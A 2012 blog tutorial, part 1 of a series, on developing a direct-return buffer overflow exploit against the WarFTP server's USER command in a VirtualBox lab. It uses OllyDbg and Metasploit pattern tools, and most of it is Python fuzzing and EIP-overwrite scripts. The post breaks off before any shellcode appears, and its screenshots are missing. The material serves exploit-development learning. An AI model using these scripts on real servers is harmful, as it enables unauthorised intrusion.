Application Hunter: Buffer Overflow War-Wftp with Direct Return(Part 1)

Minggu, 05 Februari 2012

Buffer Overflow War-Wftp with Direct Return(Part 1)

first we install Ollydbg and WarFTP on windows in virtualbox.
then we make a python script in advance:by typing the command kwrite xfuzz.py and apper picture

#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41" * 1000
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("Sendingevildatavia USER command....")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
open Warftp and click button with a picture of lightning at the far left image

then run warftp in OllyDbg pass write order #python xfuzz.py and the end result

then we exploid with write cd /pentest/exploits/framework/tools
after admission we write order ./pattern_create.rb 1000 > string_pattern.txt after that crite kwrite xfuzz.py

see for yourself later on the script, yes, .... (^_^)

then we write other ./pattern_offset.rb 32714131 then appear image

the write frequent other ./pattern_offset.rb q4Aq5Aq

continue we edit other in xfuzz.py and appear other

#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
nilaiEIP= "\x90" * 485

nilaiEIP+= "\xEF\xBE\xAD\xDE"
s.connect(('192.168.56.101',21))
data=s.recv(1024)

print("Sendingevildatavia USER command....")
s.send('USER '+nilaiEIP+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

then turn up image:

continue edit again zfuzz.py the result is :

#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x90" * 485
buffer+="\x65\x82\xA5\x7C"
buffer+="\xCC" * (493-len(buffer))
buffer+="\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101',21))
data=s.recv(1024)
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()

and appear picture :

further run ollydbg and click menu view --> then click executable modules